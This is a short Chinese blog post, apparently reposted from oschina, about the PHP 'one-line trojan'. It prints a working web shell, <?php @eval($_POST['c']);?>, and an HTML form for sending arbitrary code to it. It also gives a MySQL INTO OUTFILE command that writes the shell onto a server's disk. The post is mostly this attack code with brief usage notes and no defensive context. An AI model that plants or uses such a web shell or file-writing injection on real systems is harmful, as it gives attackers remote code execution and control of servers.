博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
关于php一句话木马
阅读量:7089 次
发布时间:2019-06-28

本文共 1267 字,大约阅读时间需要 4 分钟。

  hot3.png

Php代码 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3C%3Fphp%20%40eval(%24_POST%5B'c'%5D)%3B%3F%3E" wmode="transparent"> 收藏代码

  1. <?php @eval($_POST['c']);?>  

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 

Html代码 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform%20action%3D%22a.php%22%20method%3D%22post%22%3E%0A%3Cinput%20type%3D%22text%22%20name%3D%22c%22%20value%3D%22phpinfo()%3B%22%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22submit%22%3E%0A%3C%2Fform%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A" wmode="transparent"> 收藏代码

  1. <html>  

  2. <body>  

  3. <form action="a.php" method="post">  

  4. <input type="text" name="c" value="phpinfo();">  

  5. <input type="submit" value="submit">  

  6. </form>  

  7. </body>  

  8. </html>  

28133954_zqwu.jpg 
28133954_tDWI.jpg 
仅此做个记录,php这东西真恶心 
后补充记录: 
mysql输出文件 

Sql代码 

select '<?php @eval($_POST["c"]);?>' INTO OUTFILE 'e:/m.php'  

转载于:https://my.oschina.net/u/1777508/blog/536779

你可能感兴趣的文章